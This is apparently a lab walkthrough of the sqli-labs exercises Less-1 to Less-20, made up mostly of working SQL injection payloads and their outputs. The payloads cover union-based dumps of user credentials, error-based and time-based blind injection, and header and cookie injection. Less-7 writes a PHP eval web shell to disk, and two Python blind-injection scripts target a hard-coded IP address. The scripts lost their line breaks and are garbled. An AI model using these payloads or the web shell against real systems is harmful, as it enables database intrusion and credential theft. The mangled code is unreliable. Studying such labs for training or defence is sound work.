Less-1
?id=1' order by 3#正常
?id=1' order by 4#Unknown column '4' in 'order clause'
?id=666' union select 1,2,(select group_concat(schema_name)from information_schema.schemata)--+# information_schema,challenges,mysql,performance_schema,security
?id=666' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema = 'security')--+# emails,referers,uagents,users
?id=666' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name = 'users')--+# id,username,password
?id=666' union select 1,(select group_concat(username)from security.users),(select group_concat(password)from security.users)--+# Dumb,Angelina, Dummy, secure,stupid, superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4# Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4
Less-2# 方法同上,不过此题为数值查询
?id=666 union select 1,(select group_concat(username)from security.users),(select group_concat(password)from security.users)
Less-3
?id=666') union select 1,(select group_concat(username)from security.users),(select group_concat(password)from security.users)--+
Less-4
?id=666") union select 1,(select group_concat(username)from security.users),(select group_concat(password)from security.users)--+
Less-5
# 页面没有显示位。无法使用联合查询注入,采用报错注入
# and (select 1 from (select count(*),concat((payload),floor (rand(0)*2))x from information_schema.tables group by x)a)
?id=1' and(select 1from(select count(*),concat(((select group_concat(schema_name)from information_schema.schemata)),floor (rand(0)*2))x from information_schema.tables group by x)a)--+# Subquery returns more than 1 row
?id=1' and (select 1 from (select count(*),concat(((select concat(schema_name,';')from information_schema.schemata limit 4,1)),floor (rand(0)*2))x from information_schema.tables group by x)a)--+# Duplicate entry 'security;1' for key 'group_key'
?id=1' and (select 1 from (select count(*),concat(((select concat(table_name,";") from information_schema.tables where table_schema = 'security' limit 3,1)),floor (rand(0)*2))x from information_schema.tables group by x)a)--+# Duplicate entry 'users;1' for key 'group_key'# 以此类推
Less-6# 把'换成"
Less-7
?id=-1')) union select "<?php @eval($_POST['my']);?>" into outfile "path" --+# 一句话连上即可
Less-8# '))改为'
Less-9&10
# 区别是前者'后者"
# 经过测试发现本题是时间盲注,附上脚本:
# coding:utf-8
import requests
import datetime
# Writeup helper for Less-9/10, pasted with its line breaks and indentation
# lost (it is not runnable exactly as shown). Both functions issue a GET whose
# id parameter carries an if(...,sleep(1),...) expression and treat a round
# trip of >= 1 s as "condition true" -- a time-based blind probe. Defensive
# reading: the signals are sleep()/if()/length()/substr() fragments in query
# parameters plus long, uniform latencies for one client; a parameterized
# query on the server side removes the injection point entirely.
defdatabase_len(url):# get the database name length for i inrange(1,10):
# %s is the length guess (1..9); '%23' appended to the request is a URL-encoded '#'
payload ='''?id=1' and if(length(database())>%s,sleep(1),0)'''% i
time1 = datetime.datetime.now()
r = requests.get(url + payload +'%23')
time2 = datetime.datetime.now()
# .seconds truncates to whole seconds, so the 1 s threshold is coarse and
# sensitive to network jitter
sec =(time2 - time1).seconds
if sec >=1:print(i)else:print(i)breakprint('database_len:', i)return i
defdatabase_name(url, database_len):# get the database name
# one request per (position, candidate character); stops at the first match
name =''for j inrange(1, database_len +1):for i in'0123456789abcdefghijklmnopqrstuvwxyz':
payload ='''?id=1' and if(substr(database(),%d,1)='%s',sleep(1),1)'''%(
j, i)# print(url+payload+'%23')
time1 = datetime.datetime.now()
r = requests.get(url + payload +'%23')
time2 = datetime.datetime.now()
sec =(time2 - time1).seconds
if sec >=1:
name += i
print(name)breakprint('database_name:', name)
# hard-coded lab target URL
url ='''http://43.247.91.228:84/Less-9/'''
# NOTE(review): this rebinds the function name database_len to its int result;
# harmless here only because the function is never called again afterwards
database_len = database_len(url)
database_name(url, database_len)#database_name: security
Less-11
?uname=' or '1'='1&passwd=1'union select 1,(select group_concat(schema_name)from information_schema.schemata)#&submit=Submit#' or '1'='1绕过
Less-12
?uname=") or ("1")=("1&passwd=1")union select 1,(select group_concat(schema_name)from information_schema.schemata)#&submit=Submit#") or ("1")=("1绕过
Less-13
?uname=1')and extractvalue(1,concat(":",(select schema_name from information_schema.schemata limit 4,1)))##>XPATH syntax error: ':security'
或者
?uname=1')and(select 1from(select count(*),concat(((select concat(schema_name," | ")from information_schema.schemata limit 4,1)),floor (rand(0)*2))x from information_schema.tables group by x)a)## Duplicate entry 'security | 1' for key 'group_key'
Less-14
把')换成"
Less-15
# 没有啥反应哈,试了试万能密码确定是',然后进行时间盲注,对之前的脚本做了个升级哈,这次是多线程
# coding:utf-8
import requests
import datetime
import threading
# Writeup helper for Less-15, pasted with line breaks and indentation lost
# (not runnable exactly as shown). Same timing idea as the Less-9 script, but
# the payload is POSTed in the uname field with sleep(2) and a 2 s threshold,
# and every guess runs in its own MyThread so the length probes (1..9) and all
# name positions are sent concurrently. Defensive reading: a burst of
# near-simultaneous login POSTs from one client that each take ~2 s and carry
# if()/sleep() fragments in uname is an easy log/WAF signature; a
# parameterized login statement removes the injection itself.
defdatabase_len(url, i):
# returns True when the guessed length i is exceeded (request took >= 2 s)
postdata ={'uname':'''admin' and if(length(database())>%s,sleep(2),0) #'''% i,'passwd':'''1'''}
time1 = datetime.datetime.now()
r = requests.post(url, data=postdata)
time2 = datetime.datetime.now()
sec =(time2 - time1).seconds
if sec >=2:returnTrueelse:returnFalsedefdatabase_name(url, j):# get the database name for i in'0123456789abcdefghijklmnopqrstuvwxyz':
# returns the matching character for position j; as written it falls off the
# end and returns None when no candidate matches, which main() then
# concatenates into a str (TypeError)
postdata ={'uname':'''admin' and if(substr(database(),%d,1)='%s',sleep(2),1) #'''%(j, i),'passwd':'''1'''}# print(url+payload+'%23')
time1 = datetime.datetime.now()
r = requests.post(url, data=postdata)
time2 = datetime.datetime.now()
sec =(time2 - time1).seconds
if sec >=2:return i
# thin Thread wrapper that keeps the target's return value in self.res;
# getresult() is only valid after join(), since res is set inside run()
classMyThread(threading.Thread):def__init__(self, func, args):
threading.Thread.__init__(self)
self.func = func
self.args = args
defgetresult(self):return self.res
defrun(self):
self.res = self.func(*self.args)defmain():
flag =True
# hard-coded lab target URL; NOTE(review): if the name is longer than 9
# characters all nine probes return True, flag never becomes False and this
# while loop repeats the same nine requests forever
url ='''http://43.247.91.228:84/Less-15/'''while flag:
threads =[]for i inrange(0,9):
t = MyThread(database_len,(url, i +1))
threads.append(t)
threads[i].start()for i inrange(0,9):
threads[i].join()ifnot threads[i].getresult():
flag =False
# first guess that is not exceeded is the length
databaselength = i +1print('database_len:', databaselength)break
threads =[]
# one thread per character position, joined in order so name is assembled left to right
name =''for i inrange(0, databaselength):
t = MyThread(database_name,(url, i +1))
threads.append(t)
threads[i].start()for i inrange(0, databaselength):
threads[i].join()
name += threads[i].getresult()print("database_name :"+ name)if __name__ =='__main__':
main()#database_len: 8#database_name :security
Less-16
'改成")
Less-17#尝试了一会儿发现这里只有知道用户名才能进行注入哈,随便试了个admin发现可以,在密码发现有语法报错,于是采用报错注入
?uname=admin&passwd=1' and(select 1from(select count(*),concat(((select concat(schema_name," | ")from information_schema.schemata limit 4,1)),floor (rand(0)*2))x from information_schema.tables group by x)a)#&submit=Submit
Less-18#发现页面会返回ip和user-agent,改了下XFF发现不行呀,于是尝试在user-agent注入
User-Agent:1' and extractvalue(1,concat(":",(select schema_name from information_schema.schemata limit 4,1))) and '1'='1# XPATH syntax error:':security'
Less-19#显示位在referer,所以尝试在这里注入
Referer:1' and (select 1 from (select count(*),concat(((select concat(schema_name,';') from information_schema.schemata limit 4, 1)),floor (rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
uname=admin&passwd=admin&submit=Submit
#"security;1"
Less-20#在cookie里面注入
Cookie: uname=' and extractvalue(1,concat(":",(select schema_name from information_schema.schemata limit 4,1))) and '1'='1